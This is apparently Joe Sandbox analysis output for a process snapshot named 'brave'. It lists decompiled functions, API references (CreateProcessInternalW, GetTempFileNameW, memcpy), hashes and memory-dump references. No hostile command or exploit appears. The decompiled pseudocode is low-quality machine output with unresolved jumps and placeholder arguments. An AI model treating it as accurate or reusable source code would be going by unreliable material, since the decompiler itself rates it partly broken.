Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: memcpy$wcslen
String ID: $0$@$\??\$basic_string::_M_construct null not valid
API String ID: 1844840824-2971582370
Opcode ID: b6310038be9ed0e587d2244d6aa3330086198dbf428e7dafbcd45e618e6045f2
Instruction ID: a525d966edca50de62bbb10dac81bed73086d143fddbe6eb4d9a1263c4cc387e
Opcode Fuzzy Hash: b6310038be9ed0e587d2244d6aa3330086198dbf428e7dafbcd45e618e6045f2
Instruction Fuzzy Hash: 95516B32609B8581EB65CF15E5503AAB3A0FBC5B84F948135EB8C83B99DF7DD198CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6003CD0 Relevance: 12.1, APIs: 4, Strings: 4, Instructions: 129
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcslen.MSVCRT ref: 00007FF6A6003D01
wcslen.MSVCRT ref: 00007FF6A6003D57

Part of subcall function 00007FF6A602DEF0: memcpy.MSVCRT ref: 00007FF6A602DF96
Part of subcall function 00007FF6A602DEF0: memcpy.MSVCRT ref: 00007FF6A602DFC1

wcslen.MSVCRT ref: 00007FF6A6003DF7
memcpy.MSVCRT ref: 00007FF6A6003F26

Strings

\??\, xrefs: 00007FF6A6003D50, 00007FF6A6003D69
0, xrefs: 00007FF6A6003EA0
basic_string::_M_construct null not valid, xrefs: 00007FF6A6003F40
@, xrefs: 00007FF6A6003EAB

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: memcpywcslen
String ID: 0$@$\??\$basic_string::_M_construct null not valid
API String ID: 982415701-2209788446
Opcode ID: 630dfa24154ac0e713e2fbaf1a909fafa620e62a5589aa0f111c003e95ed9a5f
Instruction ID: 8fc30c9cad7b4ab542b4b580edc97a8e47bfd86b9ba81ee93108f7306e48a606
Opcode Fuzzy Hash: 630dfa24154ac0e713e2fbaf1a909fafa620e62a5589aa0f111c003e95ed9a5f
Instruction Fuzzy Hash: E861333260ABC185E7748F15E5503ABB3A0FB84B84F444225DB8C87B99DF7EC198CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A60028A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E00007FF67FF6A60028A0(void* __ecx, void* __edi, void* __esp, void* __rax, void* __rdx, long long __r8, long long __r9, intOrPtr _a4, long long _a12, long long _a20, long long _a28, long long _a36, long long _a44, long long _a60, long long _a64, long long _a68, long long _a76, long long _a84, char _a100, void* _a112, char _a224, char _a65824, long long _a65832) {
				long long _v4;
				long long _v12;
				void* _t32;
				void* _t33;
				intOrPtr* _t49;
				intOrPtr* _t50;

				E00007FF67FF6A600F680(0x10108);
				_a65824 = __r8;
				r8d = 0xfffe;
				_t33 = __ecx;
				_a65832 = __r9;
				memset(??, ??, ??);
				_a64 =  &_a65824;
				E00007FF67FF6A601A220(__ecx,  &_a224, __rdx, __rdx,  &_a65824);
				r9d = 0;
				memset(__edi, 0, 0xd << 0);
				_a36 =  &_a68;
				_a28 =  &_a100;
				_t49 =  *0xa62b6640; // 0x7ff6a62c1078
				_a44 =  &_a60;
				_a100 = 0x68;
				_a68 = 0;
				_a76 = 0;
				_a84 = 0;
				_a60 = 0;
				_a20 = 0;
				_a12 = 0;
				_a4 = 0x8000000;
				_v4 = 0;
				_v12 = 0;
				 *_t49(); // executed
				if (_t33 == 0) goto 0xa60029b7;
				_t50 =  *0xa62b6660; // 0x7ff6a62c1058
				_t32 =  *_t50();
				E00007FF67FF6A6004D0D();
				return _t32;
			}

0x7ff6a60028aa
0x7ff6a60028bd
0x7ff6a60028c7
0x7ff6a60028cd
0x7ff6a60028d2
0x7ff6a60028da
0x7ff6a60028fa
0x7ff6a60028ff
0x7ff6a600290b
0x7ff6a600290e
0x7ff6a600291e
0x7ff6a600292b
0x7ff6a6002930
0x7ff6a6002937
0x7ff6a600293e
0x7ff6a6002949
0x7ff6a6002952
0x7ff6a600295b
0x7ff6a6002967
0x7ff6a6002970
0x7ff6a6002979
0x7ff6a6002982
0x7ff6a600298a
0x7ff6a6002992
0x7ff6a600299b
0x7ff6a60029a4
0x7ff6a60029a6
0x7ff6a60029b5
0x7ff6a60029ba
0x7ff6a60029cc

APIs

memset.MSVCRT ref: 00007FF6A60028DA
CreateProcessInternalW.KERNELBASE ref: 00007FF6A600299B

Strings

h, xrefs: 00007FF6A600293E

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: CreateInternalProcessmemset
String ID: h
API String ID: 101748716-2439710439
Opcode ID: b53532f66e41f7bf776b4946091af2562f442538e7f02a713487e15d1bab6a89
Instruction ID: d983aa777134977bee3f0a678c838b58a2df2dcc9f75da0166fbda6d65334800
Opcode Fuzzy Hash: b53532f66e41f7bf776b4946091af2562f442538e7f02a713487e15d1bab6a89
Instruction Fuzzy Hash: 31215532608B8192E3209B25F45479BB7A5FBC4B84F504139EACC87BA9CF7DC199CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6014030 Relevance: 3.7, APIs: 2, Instructions: 652
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E00007FF67FF6A6014030(signed int* __rcx, long long __rdx, void* __r8) {
				intOrPtr _t96;
				signed int _t104;
				signed int _t110;
				signed int _t111;
				long long _t134;
				intOrPtr _t184;
				intOrPtr _t185;
				intOrPtr _t187;
				intOrPtr _t188;
				intOrPtr _t189;
				intOrPtr _t190;
				intOrPtr _t192;
				intOrPtr _t193;
				intOrPtr _t195;
				intOrPtr _t196;
				intOrPtr _t197;
				intOrPtr _t199;
				intOrPtr _t200;
				intOrPtr _t201;
				intOrPtr _t203;
				intOrPtr _t205;
				intOrPtr _t206;
				intOrPtr _t208;
				intOrPtr _t210;
				signed long long _t228;
				signed long long _t230;
				signed int* _t250;
				intOrPtr* _t251;
				long long _t252;
				long long _t259;
				signed int _t263;

				_t250 = __rcx;
				_t252 = __rdx;
				if (__rcx == 0) goto 0xa60145f0;
				_t251 =  *0xa62b6920; // 0x7ff6a62c1400
				_t184 =  *_t251;
				if (_t184 == 0) goto 0xa60142f8;
				if ( *((long long*)(_t184 + 0x38)) != 0) goto 0xa6014318;
				 *((long long*)(_t184 + 0x38)) = 0xa62b2bd0;
				E00007FF67FF6A60184D0(0xa62b2bd0);
				_t185 =  *_t251;
				if (_t185 == 0) goto 0xa601432d;
				if ( *((long long*)(_t185 + 0x48)) == 0) goto 0xa6014458;
				_t96 =  *((intOrPtr*)( *((intOrPtr*)(_t185 + 0x48))));
				goto 0xa60140e5;
				_t228 =  *((intOrPtr*)( *_t251 + 0x40));
				_t187 =  *_t251;
				if (_t96 -  *_t228 >= 0) goto 0xa6014100;
				if ( *((long long*)(_t187 + 0x10)) == 0) goto 0xa6014358;
				if ( *((long long*)( *((intOrPtr*)( *((intOrPtr*)(_t187 + 0x10)))) + _t228 * 8)) == 0) goto 0xa6014470;
				if (_t187 == 0) goto 0xa6014370;
				if ( *((long long*)(_t187 + 0x40)) != 0) goto 0xa60140b0;
				 *((long long*)(_t187 + 0x40)) = 0xa62c13c4;
				if (_t96 + 1 -  *0xa62c13c4 < 0) goto 0xa60140bb;
				goto 0xa601414d;
				asm("o16 nop [eax+eax]");
				_t230 =  *((intOrPtr*)(_t187 + 0x48));
				_t188 =  *_t251;
				if (0 -  *_t230 >= 0) goto 0xa6014168;
				if ( *((long long*)(_t188 + 0x10)) == 0) goto 0xa60143d8;
				_t263 = _t230 * 8;
				if ( *((long long*)( *((intOrPtr*)( *((intOrPtr*)(_t188 + 0x10)))) + _t230 * 8)) == 0) goto 0xa60144d0;
				if (_t188 == 0) goto 0xa60143f0;
				if ( *((long long*)(_t188 + 0x48)) != 0) goto 0xa6014118;
				 *((long long*)(_t188 + 0x48)) = 0xa62c13c0;
				if (1 -  *0xa62c13c0 < 0) goto 0xa6014123;
				if (_t188 == 0) goto 0xa6014765;
				if ( *((long long*)(_t188 + 0x40)) == 0) goto 0xa60145b0;
				_t189 =  *_t251;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t188 + 0x40)))) == 0x100000) goto 0xa60145cb;
				if (_t189 == 0) goto 0xa60147ee;
				_t134 =  *((long long*)(_t189 + 0x40));
				if (_t134 == 0) goto 0xa6014608;
				_t190 =  *_t251;
				if (_t134 != 0) goto 0xa60141cb;
				if ( *((long long*)(_t190 + 0x40)) != 0) goto 0xa60147e5;
				 *((long long*)(_t190 + 0x40)) = 0xa62c13c4;
				_t104 =  >  ? 0x100000 :  *0xa62c13c4 + 1;
				if (_t190 == 0) goto 0xa6014997;
				if ( *((long long*)(_t190 + 0x10)) == 0) goto 0xa60146d0;
				realloc(??, ??);
				_t259 =  *((intOrPtr*)(_t190 + 0x10));
				_t192 =  *_t251;
				if (_t259 == 0) goto 0xa6014b52;
				if (_t192 == 0) goto 0xa60149d5;
				if ( *((long long*)(_t192 + 0x40)) == 0) goto 0xa60146b8;
				_t193 =  *_t251;
				r8d = _t104;
				r8d = r8d -  *((intOrPtr*)( *((intOrPtr*)(_t192 + 0x40))));
				if ( *(_t193 + 0x40) == 0) goto 0xa60146a0;
				memset(??, ??, ??);
				_t195 =  *_t251;
				if (_t195 == 0) goto 0xa6014971;
				if ( *((long long*)(_t195 + 0x10)) == 0) goto 0xa6014680;
				_t196 =  *_t251;
				 *((long long*)( *((intOrPtr*)(_t195 + 0x10)))) = _t259;
				if (_t196 == 0) goto 0xa6014852;
				if ( *((long long*)(_t196 + 0x40)) == 0) goto 0xa6014670;
				_t197 =  *_t251;
				r12d =  *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x40))));
				if ( *((long long*)(_t197 + 0x48)) == 0) goto 0xa6014660;
				r12d = r12d + 1;
				 *((intOrPtr*)( *((intOrPtr*)(_t197 + 0x48)))) = r12d;
				if ( *(_t197 + 0x40) == 0) goto 0xa6014650;
				_t110 =  *( *(_t197 + 0x40));
				 *__rcx = _t110;
				if ( *(_t197 + 0x40) == 0) goto 0xa6014640;
				 *( *(_t197 + 0x40)) = _t104;
				if (__rdx == 0) goto 0xa601473d;
				if ( *((long long*)(_t197 + 0x10)) == 0) goto 0xa6014708;
				 *((long long*)( *((intOrPtr*)( *((intOrPtr*)(_t197 + 0x10)))) + (_t259 +  *(_t193 + 0x40) * 8) * 8)) = __rdx;
				goto 0xa60144f6;
				E00007FF67FF6A6017060(); // executed
				if ( *((long long*)(_t197 + 0x38)) == 0) goto 0xa601406b;
				if ( *_t251 != 0) goto 0xa6014318;
				E00007FF67FF6A6017060();
				E00007FF67FF6A60184D0( *((intOrPtr*)( *_t251 + 0x38)));
				_t199 =  *_t251;
				if (_t199 != 0) goto 0xa6014087;
				E00007FF67FF6A6017060();
				_t200 =  *_t251;
				if ( *((long long*)(_t199 + 0x48)) == 0) goto 0xa6014458;
				if (_t200 != 0) goto 0xa6014092;
				E00007FF67FF6A6017060();
				goto 0xa6014092;
				 *((long long*)(_t200 + 0x10)) = _t259;
				goto 0xa60140ca;
				E00007FF67FF6A6017060();
				_t201 =  *_t251;
				if ( *((long long*)(_t200 + 0x40)) == 0) goto 0xa60140f5;
				if (_t201 != 0) goto 0xa60140b0;
				E00007FF67FF6A6017060();
				if ( *((intOrPtr*)( *((intOrPtr*)(_t201 + 0x40)))) - _t104 <= 0) goto 0xa6014b5d;
				_t203 =  *_t251;
				if (_t203 != 0) goto 0xa60140bb;
				E00007FF67FF6A6017060();
				if ( *((long long*)(_t203 + 0x10)) == 0) goto 0xa6014358;
				if ( *_t251 != 0) goto 0xa60140c6;
				E00007FF67FF6A6017060();
				_t205 =  *_t251;
				goto 0xa60140ca;
				 *((long long*)(_t205 + 0x10)) = _t259;
				goto 0xa6014132;
				E00007FF67FF6A6017060();
				_t206 =  *_t251;
				if ( *((long long*)(_t205 + 0x48)) == 0) goto 0xa601415d;
				if (_t206 != 0) goto 0xa6014118;
				E00007FF67FF6A6017060();
				if ( *((intOrPtr*)( *((intOrPtr*)(_t206 + 0x48)))) - _t104 <= 0) goto 0xa6014b65;
				_t208 =  *_t251;
				if (_t208 != 0) goto 0xa6014123;
				E00007FF67FF6A6017060();
				if ( *((long long*)(_t208 + 0x10)) == 0) goto 0xa60143d8;
				if ( *_t251 != 0) goto 0xa601412e;
				E00007FF67FF6A6017060();
				_t210 =  *_t251;
				goto 0xa6014132;
				 *((long long*)(_t210 + 0x48)) = 0xa62c13c0;
				goto 0xa6014099;
				 *_t250 = _t104;
				if (_t252 == 0) goto 0xa6014570;
				if (_t210 == 0) goto 0xa6014728;
				_t111 = _t110 & 0xffffff00 |  *((long long*)(_t210 + 0x10)) != 0x00000000;
				if (_t111 == 0) goto 0xa601455c;
				if (_t210 == 0) goto 0xa60147cb;
				 *((long long*)( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x10)))) + _t263)) = _t252;
				if (_t210 == 0) goto 0xa60146f3;
				if ((_t111 & 0xffffff00 |  *((long long*)(_t210 + 0x38)) != 0x00000000) == 0) goto 0xa601454f;
				if (_t210 != 0) goto 0xa6014502;
				E00007FF67FF6A6017060();
				goto 0xa6014502;
				 *_t250 = _t104;
				if (_t252 == 0) goto 0xa601451c;
				if (_t210 == 0) goto 0xa6014a4e;
				if ( *((long long*)(_t210 + 0x10)) == 0) goto 0xa60146e3;
				 *((long long*)( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x10)))) + _t263)) = _t252;
				if (_t210 == 0) goto 0xa6014539;
				if ( *((long long*)(_t210 + 0x38)) == 0) goto 0xa601454f;
				E00007FF67FF6A6018410( *((intOrPtr*)(_t210 + 0x38)));
				return 0;
			}

0x7ff6a601403e
0x7ff6a6014041
0x7ff6a6014047
0x7ff6a601404d
0x7ff6a6014054
0x7ff6a601405a
0x7ff6a6014065
0x7ff6a6014072
0x7ff6a6014076
0x7ff6a601407b
0x7ff6a6014081
0x7ff6a601408c
0x7ff6a6014099
0x7ff6a60140a9
0x7ff6a60140b0
0x7ff6a60140b4
0x7ff6a60140b9
0x7ff6a60140c0
0x7ff6a60140dc
0x7ff6a60140e8
0x7ff6a60140f3
0x7ff6a60140f8
0x7ff6a60140fe
0x7ff6a6014110
0x7ff6a6014112
0x7ff6a6014118
0x7ff6a601411c
0x7ff6a6014121
0x7ff6a6014128
0x7ff6a6014137
0x7ff6a6014144
0x7ff6a6014150
0x7ff6a601415b
0x7ff6a6014160
0x7ff6a6014166
0x7ff6a601416b
0x7ff6a6014176
0x7ff6a6014180
0x7ff6a6014189
0x7ff6a6014192
0x7ff6a6014198
0x7ff6a601419d
0x7ff6a60141a7
0x7ff6a60141ae
0x7ff6a60141b5
0x7ff6a60141c2
0x7ff6a60141d6
0x7ff6a60141e3
0x7ff6a60141ee
0x7ff6a60141fb
0x7ff6a6014200
0x7ff6a6014203
0x7ff6a6014209
0x7ff6a6014212
0x7ff6a601421d
0x7ff6a6014227
0x7ff6a601422e
0x7ff6a6014231
0x7ff6a601423b
0x7ff6a601424d
0x7ff6a6014252
0x7ff6a6014258
0x7ff6a6014263
0x7ff6a601426d
0x7ff6a6014270
0x7ff6a6014276
0x7ff6a6014281
0x7ff6a601428b
0x7ff6a601428e
0x7ff6a6014296
0x7ff6a60142a0
0x7ff6a60142a4
0x7ff6a60142ac
0x7ff6a60142b6
0x7ff6a60142b8
0x7ff6a60142bf
0x7ff6a60142c9
0x7ff6a60142ce
0x7ff6a60142d9
0x7ff6a60142e8
0x7ff6a60142ec
0x7ff6a60142f8
0x7ff6a6014305
0x7ff6a601430e
0x7ff6a6014310
0x7ff6a601431c
0x7ff6a6014321
0x7ff6a6014327
0x7ff6a601432d
0x7ff6a6014337
0x7ff6a601433a
0x7ff6a6014343
0x7ff6a6014349
0x7ff6a601434e
0x7ff6a6014358
0x7ff6a6014363
0x7ff6a6014370
0x7ff6a601437a
0x7ff6a601437d
0x7ff6a6014386
0x7ff6a601438c
0x7ff6a6014397
0x7ff6a601439d
0x7ff6a60143a3
0x7ff6a60143a9
0x7ff6a60143b9
0x7ff6a60143be
0x7ff6a60143c4
0x7ff6a60143cd
0x7ff6a60143d0
0x7ff6a60143d8
0x7ff6a60143e3
0x7ff6a60143f0
0x7ff6a60143fa
0x7ff6a60143fd
0x7ff6a6014406
0x7ff6a601440c
0x7ff6a6014417
0x7ff6a601441d
0x7ff6a6014423
0x7ff6a6014429
0x7ff6a6014439
0x7ff6a601443e
0x7ff6a6014444
0x7ff6a601444d
0x7ff6a6014450
0x7ff6a601445f
0x7ff6a6014463
0x7ff6a6014470
0x7ff6a6014475
0x7ff6a601447e
0x7ff6a6014489
0x7ff6a601448e
0x7ff6a6014497
0x7ff6a60144a4
0x7ff6a60144ab
0x7ff6a60144bb
0x7ff6a60144c4
0x7ff6a60144c6
0x7ff6a60144cb
0x7ff6a60144d0
0x7ff6a60144d5
0x7ff6a60144da
0x7ff6a60144e5
0x7ff6a60144f2
0x7ff6a60144f9
0x7ff6a6014500
0x7ff6a6014506
0x7ff6a601451b

APIs

realloc.MSVCRT ref: 00007FF6A60141FB

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: realloc
String ID:
API String ID: 471065373-0
Opcode ID: e336d157d8cadeff1a172b5fc071843bb7c4cd571cbffa88969bb0cc07652b88
Instruction ID: 8688b9c8c48fd7400a7293412fb8e3a75900b8e4dd707aeb9ef9999bf502fe70
Opcode Fuzzy Hash: e336d157d8cadeff1a172b5fc071843bb7c4cd571cbffa88969bb0cc07652b88
Instruction Fuzzy Hash: 4F621976A0AB0681EB659F05D2903B967A0EB54F88F054435DA5D873E1DF7FE8E0C320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6013F00 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00007FF67FF6A6013F00(void* __rax, intOrPtr* __rcx, void* __rdx) {
				intOrPtr _t8;
				void* _t14;

				_t14 = __rax;
				if (__rdx == 0) goto 0xa6014018;
				if ( *__rcx == 1) goto 0xa6013f68;
				E00007FF67FF6A6010F00(__rcx);
				_t1 = _t14 + 8; // 0x8
				E00007FF67FF6A60104E0(_t1);
				_t8 =  *__rcx;
				if (_t8 == 0) goto 0xa6013f80;
				if (_t8 != 1) goto 0xa6013ff0;
				E00007FF67FF6A6010800(_t1);
				E00007FF67FF6A6011110(_t14);
				return 0;
			}

0x7ff6a6013f00
0x7ff6a6013f16
0x7ff6a6013f1f
0x7ff6a6013f21
0x7ff6a6013f26
0x7ff6a6013f30
0x7ff6a6013f35
0x7ff6a6013f39
0x7ff6a6013f3e
0x7ff6a6013f47
0x7ff6a6013f4f
0x7ff6a6013f61

APIs

Part of subcall function 00007FF6A6010F00: calloc.MSVCRT(?,?,00007FFC2FC93CA0,00007FF6A6013F26,?,?,?,?,0000017A76FB17F0,00007FFC2FC93CA0,?,00007FF6A601029B,0000017A76FB17F0,00000000,00007FFC2FC93CA0,00007FF6A60032FA), ref: 00007FF6A60110A4

fprintf.MSVCRT ref: 00007FF6A601400B

Strings

once %p is %d, xrefs: 00007FF6A6014001

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: callocfprintf
String ID: once %p is %d
API String ID: 3366074580-95064319
Opcode ID: 6e9b06d7a7e3d48af93b056f8de7be245cf1a8abe53ffd6387711d9ba53eb8ef
Instruction ID: b7eb231784521052d0f0fe74fb84a8bab9fedd9a6dec5d7813b2aae4c851c2c7
Opcode Fuzzy Hash: 6e9b06d7a7e3d48af93b056f8de7be245cf1a8abe53ffd6387711d9ba53eb8ef
Instruction Fuzzy Hash: 3B31F572A0B70281FA559B15F6412BA63A4BF84F98F44407AEE6D873A5EF3DD4E1C210

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A60027F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E00007FF67FF6A60027F0(void* __edi, void* __esp, long long __rcx, void* __rdx, long long __r8) {
				void* _v136;
				long long _v144;
				char _v148;
				char _v156;
				long long _v172;
				long long _v180;
				long long _v188;
				long long _v196;
				long long _v204;
				intOrPtr _v212;
				long long _v220;
				long long _v228;
				void* _t19;
				intOrPtr* _t30;

				_v144 = 0;
				memset(__edi, 0, 0xd << 0);
				_v196 = __r8;
				_v172 =  &_v156;
				_v188 =  &_v148;
				_t30 =  *0xa62b6640; // 0x7ff6a62c1078
				_v212 = r9d;
				r9d = 0;
				_v148 = 0x68;
				 *((long long*)(__rcx)) = 0;
				 *((long long*)(__rcx + 8)) = 0;
				 *((long long*)(__rcx + 0x10)) = 0;
				_v180 = __rcx;
				_v204 = 0;
				_v220 = 0;
				_v228 = 0;
				_t19 =  *_t30(); // executed
				return _t19;
			}

0x7ff6a6002809
0x7ff6a6002812
0x7ff6a600281a
0x7ff6a6002822
0x7ff6a600282e
0x7ff6a6002833
0x7ff6a600283a
0x7ff6a600283f
0x7ff6a6002842
0x7ff6a600284a
0x7ff6a6002852
0x7ff6a600285b
0x7ff6a6002864
0x7ff6a6002869
0x7ff6a6002872
0x7ff6a600287a
0x7ff6a6002883
0x7ff6a6002892

APIs

CreateProcessInternalW.KERNELBASE ref: 00007FF6A6002883

Strings

h, xrefs: 00007FF6A6002842

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: CreateInternalProcess
String ID: h
API String ID: 2186235152-2439710439
Opcode ID: 8bba045a17cefcb5b05322b069f8357d251dc813df342985f80b1a2e19d1b3c7
Instruction ID: 9740c0439417e4b54fe0e084f540770cf40558ba596465fae6bb609258832832
Opcode Fuzzy Hash: 8bba045a17cefcb5b05322b069f8357d251dc813df342985f80b1a2e19d1b3c7
Instruction Fuzzy Hash: D401E832618B8082E7508F54F45874BB7A4F784784FA08129EBC807B68DFBDC158CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6004880 Relevance: 3.1, APIs: 2, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E00007FF67FF6A6004880(void* __edi, void* __esp, void* __rax, void* __rcx, void* __rdx, void* __r9) {
				void* _v596;
				void* _v608;
				char _v1112;
				void* _t13;
				void* _t27;
				void* _t40;

				_t27 = __rax;
				r12d = r8d;
				memset(__edi + 0x41, memset(__edi, 0, 0x41 << 0), 0x41 << 0);
				GetTempPathW(??, ??);
				r8d = 0;
				GetTempFileNameW(??, ??, ??, ??); // executed
				r8d = r12d;
				_t13 = E00007FF67FF6A6004530(__rax,  &_v1112, __rdx, _t40); // executed
				if (_t27 - 1 - 0xfffffffd <= 0) goto 0xa6004928;
				return _t13;
			}

0x7ff6a6004880
0x7ff6a600489b
0x7ff6a60048c4
0x7ff6a60048d7
0x7ff6a60048e0
0x7ff6a60048e8
0x7ff6a60048ee
0x7ff6a60048f7
0x7ff6a6004907
0x7ff6a6004921

APIs

GetTempPathW.KERNEL32 ref: 00007FF6A60048D7
GetTempFileNameW.KERNEL32 ref: 00007FF6A60048E8

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
